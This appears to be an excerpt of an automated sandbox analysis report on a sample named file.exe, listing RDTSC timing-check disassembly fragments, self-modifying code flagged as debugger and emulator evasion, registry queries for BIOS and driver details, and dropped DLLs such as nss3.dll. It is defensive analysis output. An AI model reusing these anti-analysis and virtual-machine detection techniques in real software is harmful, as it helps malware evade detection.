Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A654 second address: D0A666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F2EE8E96BDAh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0AD42 second address: D0AD4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B40D second address: D0B427 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2EE8E96BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2EE8E96BCDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D092C4 second address: D092CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16B4F second address: D16B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16B53 second address: D16B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16B59 second address: D16B6B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007F2EE8E96BC6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F2EE8E96BC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26317 second address: D2631D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D25EBA second address: D25EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007F2EE8E96BC6h 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F2EE8E96BC6h 0x00000018 popad 0x00000019 push edi 0x0000001a js 00007F2EE8E96BC6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D28EED second address: D28EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D28EF3 second address: D28F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2EE8E96BCFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D28F09 second address: D28F15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007F2EE8DE76F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2894C second address: D28952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D28952 second address: D28965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F2EE8DE76FCh 0x0000000d jg 00007F2EE8DE76F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D28965 second address: D2896C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2896C second address: D28972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3568E second address: D35692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D35692 second address: D356B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F2EE8DE76FFh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F2EE8DE76F6h 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D35505 second address: D3550F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F2EE8E96BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3550F second address: D35519 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2EE8DE76F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37921 second address: D37954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BD1h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F2EE8E96BC6h 0x00000015 jmp 00007F2EE8E96BD2h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3AA01 second address: D3AA06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3AA06 second address: D3AA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F2EE8E96BCAh 0x0000000b jl 00007F2EE8E96BC6h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 js 00007F2EE8E96BCEh 0x0000001b jne 00007F2EE8E96BC6h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 pushad 0x00000024 jp 00007F2EE8E96BC6h 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c jne 00007F2EE8E96BC6h 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 pushad 0x00000036 jg 00007F2EE8E96BC6h 0x0000003c jnl 00007F2EE8E96BC6h 0x00000042 popad 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F2EE8E96BD6h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D42A3E second address: D42A8D instructions: 0x00000000 rdtsc 0x00000002 js 00007F2EE8DE76F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2EE8DE76FAh 0x00000011 jbe 00007F2EE8DE7711h 0x00000017 jnc 00007F2EE8DE76F6h 0x0000001d jmp 00007F2EE8DE7705h 0x00000022 push edi 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop edi 0x00000026 popad 0x00000027 push ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F2EE8DE76FEh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D42A8D second address: D42A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D412E0 second address: D412E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41422 second address: D41426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41426 second address: D41436 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2EE8DE76F6h 0x00000008 jl 00007F2EE8DE76F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4183E second address: D4185A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BD2h 0x00000007 jng 00007F2EE8E96BC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D419AE second address: D419B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41AF7 second address: D41B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2EE8E96BCDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F2EE8E96BDCh 0x00000011 jmp 00007F2EE8E96BD4h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41B26 second address: D41B2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41B2B second address: D41B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F2EE8E96BC6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41CBF second address: D41CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41CC8 second address: D41CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007F2EE8E96BC6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 ja 00007F2EE8E96BC6h 0x00000019 popad 0x0000001a pushad 0x0000001b jo 00007F2EE8E96BC6h 0x00000021 jnl 00007F2EE8E96BC6h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4275A second address: D42765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2EE8DE76F6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D45893 second address: D458C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BD6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2EE8E96BD3h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D45575 second address: D455A6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F2EE8DE7701h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F2EE8DE7700h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D455A6 second address: D455B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2EE8E96BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4FE14 second address: D4FE41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2EE8DE7708h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2EE8DE76FFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D705 second address: D5D709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D709 second address: D5D722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2EE8DE76F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007F2EE8DE76F6h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D57B second address: D5D59E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2EE8E96BD2h 0x00000008 jmp 00007F2EE8E96BCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5D59E second address: D5D5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F2EE8DE7712h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5F681 second address: D5F685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5F685 second address: D5F69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2EE8DE76FAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5F69B second address: D5F6A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5F6A4 second address: D5F6AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5F2BB second address: D5F2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6286F second address: D62889 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F2EE8DE76FEh 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D62889 second address: D628A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE8E96BD9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7068F second address: D70695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D70695 second address: D7069B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7069B second address: D706A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D706A0 second address: D706AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2EE8E96BCEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D706AC second address: D706B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D70822 second address: D70828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D70828 second address: D7082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7082C second address: D70832 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D709B1 second address: D709D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2EE8DE7708h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D709D0 second address: D709F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F2EE8E96BC6h 0x0000000e ja 00007F2EE8E96BC6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jng 00007F2EE8E96BD6h 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D709F2 second address: D709F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D70B26 second address: D70B43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F2EE8E96BCEh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71215 second address: D71219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71219 second address: D71223 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2EE8E96BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71223 second address: D7122D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2EE8DE76F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7136A second address: D71370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D73F1F second address: D73F2D instructions: 0x00000000 rdtsc 0x00000002 js 00007F2EE8DE76F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D73F2D second address: D73F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D73F86 second address: D73F94 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2EE8DE76F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7423D second address: D74241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D74241 second address: D74262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE76FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f js 00007F2EE8DE76FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D74262 second address: D742B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 je 00007F2EE8E96BC6h 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push esi 0x00000012 pushad 0x00000013 je 00007F2EE8E96BC6h 0x00000019 jmp 00007F2EE8E96BD7h 0x0000001e popad 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 jno 00007F2EE8E96BC6h 0x0000002c jmp 00007F2EE8E96BD2h 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 pop edi 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D757E2 second address: D757EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F2EE8DE76F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D77069 second address: D7708C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F2EE8E96BD9h 0x0000000c jmp 00007F2EE8E96BCDh 0x00000011 jne 00007F2EE8E96BC6h 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7708C second address: D7709F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2EE8DE76FAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D02C7 second address: 53D02EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 call 00007F2EE8E96BD3h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D02EA second address: 53D0333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE7709h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F2EE8DE76FEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2EE8DE7707h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0333 second address: 53D0357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0357 second address: 53D036A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8DE76FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D03B9 second address: 53D03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE8E96BCBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D03C8 second address: 53D0404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F2EE8DE7705h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2EE8DE7708h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0404 second address: 53D0413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE8E96BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0BA8 second address: 53D0C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F2EE8DE7709h 0x0000000e xor ah, FFFFFFF6h 0x00000011 jmp 00007F2EE8DE7701h 0x00000016 popfd 0x00000017 call 00007F2EE8DE7700h 0x0000001c mov si, 4071h 0x00000020 pop eax 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F2EE8DE76FDh 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F2EE8DE76FDh 0x00000031 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AF1997 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: C8F2FB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D1859C instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
